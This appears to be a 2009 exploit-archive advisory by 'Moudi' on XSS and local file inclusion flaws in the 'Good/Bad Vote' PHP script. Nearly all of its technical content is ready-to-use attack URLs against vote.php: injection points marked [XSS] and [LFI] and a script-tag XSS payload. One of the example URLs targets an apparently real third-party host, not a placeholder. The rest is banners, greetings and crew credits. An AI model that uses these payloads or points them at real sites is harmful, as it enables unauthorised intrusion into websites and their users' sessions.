[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Good/Bad Vote (XSS/LFI) Multiple Remote Vulnerabilities
# Published : 2009-07-17
# Author : Moudi
# Previous Title : WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[??] Good/Bad Vote (XSS/LFI) Vulnerability
==============================================================================
[??] Script: [ Good/Bad Vote ]
[??] Language: [ PHP ]
[??] Download: [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1086552418 ]
[??] Founder: [ Moudi <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[??] Team: [ EvilWay ]
[??] Dork: [ OFF ]
[??] Price: [ 6 US $ ]
###########################################################################
===[ Exploit XSS vulnerability ]===
[??] http://www.site.com/patch/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt
[??] http://searchall.iwebland.com:80/sigs/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt
XSS TO ADD: 1<script>alert(314154736094)</script>
===[ Exploit LFI ]===
[??] http://www.site.com/patch/vote.php?action=dovote&id=[LFI]&ficdest=.dat&midcast=.txt
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-17]